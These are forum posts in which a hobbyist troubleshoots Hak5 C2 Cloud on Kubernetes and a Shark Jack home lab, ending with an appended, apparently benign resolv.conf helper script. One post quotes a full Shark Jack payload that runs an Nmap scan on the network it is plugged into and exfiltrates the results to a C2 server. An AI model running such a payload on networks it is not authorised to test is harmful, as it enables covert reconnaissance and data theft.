Peque

Peque's Achievements

  1. First of all - thanks for replying.

     Well, I'm still a newbie trying to gain more knowledge, so sorry if I'm missing some critical information on what I mean with the kubernetes/C2 Cloud server. This little setup is just a TuringPi2 as a little cluster for learning more.

     C2 Cloud Perspective - I'm trying to set it for a C2 cloud perspective.

     Creating the kubernetes from the docker-compose file from this https://github.com/LindezaGrey/hak5c2, converting with kompose, gives the 3 attached files, which I load into my kubernetes, but in the hak5c2-deployment.yaml I could set the hostname for the instance.

     hak5c2-deployment.yaml
     c2db-persistentvolumeclaim.yaml
     hak5c2-service.yaml

     So perhaps it's just a small change - but it seems I can't see it at the moment.

     With my first login to the C2 kubernetes, I'm adding a line to my hosts file on my pineapple - the IP of the C2 as an FQDN - such as

     192.168.200.15 c2.example.org c2

     So now my C2 itself resolves the FQDN - so it should

     The C2 itself - After the C2 server is deployed on kubernetes, it'll only set a hostname for the C2 instance - called c2. I can add the domain name as example.org to the C2 server's /etc/hosts so it'll now resolve the FQDN - but still any created devices have this line in the beginning of the device.config.

     Creating the device.config files

     From my old C2 cloud - creating a device.config - shows the FQDN in the device.config: c2.example.org 8080

     From my new Kubernetes C2 - creating a device.config - it'll only show the hostname - and not the FQDN: c2 8080

     c2*8080B _� instead of c2.example.org*8080B _� as it shows from the old C2 server running as a VM - in the encrypted file for the devices.

     This is the only way I can resolve c2 - as the device.config file is showing I should. This was created for making sure the devices can connect to C2.example.org and verifying that the ports etc. are open.

     Well - and perhaps here my knowledge comes to an end and what I'm doing is confused.

     But when I log in to the c2 server in a browser it's with the FQDN (internal DNS on PFsense). The last step is getting the right FQDN to the C2 server itself - so I can create the device files correctly (and I have tried to change the path in the device.config - but that'll not work either).

     So hopefully I've explained it a little bit further.

     P
  2. Hi Forum.

     For gaining more knowledge, I'm playing around with kubernetes and trying to move my setup to k8s. Almost anything on the cloud is working as intended - I have an issue on the C2 server.

     When creating the deployment on Kubernetes it's only possible to set the hostname and not the FQDN. Is there any way to change this? The only option is after the server is deployed, but then the hostname is shown as c2 and not the FQDN.

     After adding the static IP in the pineapple's /etc/hosts - so that c2 resolves to the FQDN - the C2 still sets only hostname - and not hostname -f.

     Is it possible to handle this issue in another way?
  3. I have placed the device.config in /etc/.

     Yes - my C2 is running https. I have also tried the default payload --> with just should test this C2EXFIL - but still not getting anything to my C2 Cloud.

     The only thing in cc-client-error is these 3 lines repeating:

         [1646558183 !ERR INITSYNC ] Error in startup sync post
         [1646558183 !ERR MAIN ] Device startup sync failed. Retrying...
         [1646558188 !ERR CURL ] Error posting update to server...

     But other devices on the same network are working without problem.

     Well - found the problem - internal DNS, since this is just a test setup at the moment, on a separate network at home.

     /etc/resolv.conf --> only nameserver 127.0.0.1

     Adding my local DNS server (PFsense firewall) - and now I'm able to connect to the C2 Cloud.

     Extra: Is it possible to make it add this DNS server automatically - as a failover DNS, so if the default DNS - 127.0.0.1 - does not resolve - then add a specified extra DNS server?

     And thanks for the input - that gave me the answer.
  4. Hi Forum

     I've bought an essentialKit, and have most of it running as expected. I've downloaded the payload from the Hak5 Git repos - this payload --> https://github.com/hak5/sharkjack-payloads/tree/master/payloads/library/recon/Nmap-C2

     The Sharkjack is updated to the latest firmware - version 1.1.0 - and I can see the Sharkjack does everything that I want, the loot is created etc. I can see that during execution of the payload the Sharkjack gets an IP on the target network - but nothing gets through to my C2 Cloud.

     As far as I can see, it shouldn't be an issue with my C2 Cloud, since I have a Wifi Pineapple, LAN Turtle and Squirrel running and connecting to C2 Cloud.

     How can I check this further, since as far as I can see I cannot SSH to the Sharkjack while the payloads run? And I have tried reconfiguring my C2 Cloud settings on the jack several times without any luck.

     The executed payload:

         #!/bin/bash
         #
         # Title:   Nmap Payload for Shark Jack w/ C2
         # Author:  Hak5 (modifications from REDD)
         # Version: 1.1
         #
         # All credit goes to Hak5 Team. I just through in a simple check for if
         # C2 is provisioned in the SharkJack. - If so, exfiltrate!
         #
         # Scans target subnet with Nmap using specified options. Saves each scan result
         # to loot storage folder. Exfiltrates all scans to C2 if provisioned.
         #
         # LED SETUP ... Obtaining IP address from DHCP
         # LED ATTACK ... Scanning
         # LED FINISH ... Scan Complete
         #
         # See nmap --help for options. Default "-sP" ping scans the address space for
         # fast host discovery.

         C2PROVISION="/etc/device.config"
         NMAP_OPTIONS="-sP --host-timeout 30s --max-retries 3"
         LOOT_DIR=/root/loot/nmap

         # Setup loot directory, DHCP client, and determine subnet
         LED SETUP
         mkdir -p $LOOT_DIR
         COUNT=$(($(ls -l $LOOT_DIR/*.txt | wc -l)+1))
         NETMODE DHCP_CLIENT
         while [ -z "$SUBNET" ]; do
           sleep 1 && SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
         done

         # Scan network
         LED ATTACK
         nmap $NMAP_OPTIONS $SUBNET -oN $LOOT_DIR/nmap-scan_$COUNT.txt

         # Exfiltrate Loot to Cloud C2
         if [[ -f "$C2PROVISION" ]]; then
           LED SPECIAL
           # Connect to Cloud C2
           C2CONNECT
           # Wait until Cloud C2 connection is established
           while ! pgrep cc-client; do sleep 1; done
           # Exfiltrate all test loot files
           FILES="$LOOT_DIR/*.txt"
           for f in $FILES; do C2EXFIL STRING $f Nmap-C2-Payload; done
         else
           # Exit script if not provisioned for C2
           LED R SOLID
           exit 1
         fi

         LED FINISH
         sleep 2 && halt

     Can I just disable the last 2 lines - so I can SSH into the jack to see what and if there's an error while trying to connect to my C2 Cloud?

     Since everything else is working as intended, I do not get why I can't get this Sharkjack to deliver to my C2 Cloud.

     Any ideas of what is wrong?

     /P
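An added example, not part of the original posts and not Hak5 code: the resolver change described in the third post (a resolv.conf listing only nameserver 127.0.0.1, then adding the local DNS server), written as an idempotent helper that keeps the existing entry first and refuses malformed input. The function names and the address 192.168.200.1 are assumptions; on systems that regenerate /etc/resolv.conf the appended line is lost at the next rewrite.

```shell
#!/bin/sh
# Added example (not from the original posts). 192.168.200.1 is a constructed
# address standing in for the local DNS server (the pfSense firewall).

# valid_ipv4 IP -> exit 0 only for a dotted quad with every octet in 0..255
valid_ipv4() {
    case $1 in ''|*[!0-9.]*) return 1 ;; esac   # digits and dots only, no newlines
    echo "$1" | awk -F. 'NF != 4 { exit 1 }
        { for (i = 1; i <= 4; i++) if ($i == "" || $i > 255) exit 1 }'
}

# has_nameserver FILE IP -> exit 0 if FILE already lists IP as a nameserver
has_nameserver() {
    awk -v ip="$2" '$1 == "nameserver" && $2 == ip { found = 1 }
        END { exit !found }' "$1"
}

# count_nameservers FILE -> prints the number of nameserver lines
count_nameservers() {
    awk '$1 == "nameserver" { n++ } END { print n + 0 }' "$1"
}

# ensure_fallback_dns FILE IP
#   Leaves existing entries (such as 127.0.0.1) untouched and first, and
#   appends IP once. Returns 2 for a malformed IP, 3 if FILE is missing.
ensure_fallback_dns() {
    file=$1
    ip=$2
    valid_ipv4 "$ip" || return 2
    [ -f "$file" ] || return 3
    has_nameserver "$file" "$ip" && return 0    # already present: no change
    # Do not glue the new entry onto an unterminated last line.
    if [ -s "$file" ] && [ "$(tail -c 1 "$file" | wc -l)" -eq 0 ]; then
        printf '\n' >> "$file"
    fi
    printf 'nameserver %s\n' "$ip" >> "$file"
}

# Usage (as root, on the device): ensure_fallback_dns /etc/resolv.conf 192.168.200.1
```

Because the helper only appends when the entry is absent, it can run on every boot or at the start of a payload without growing the file.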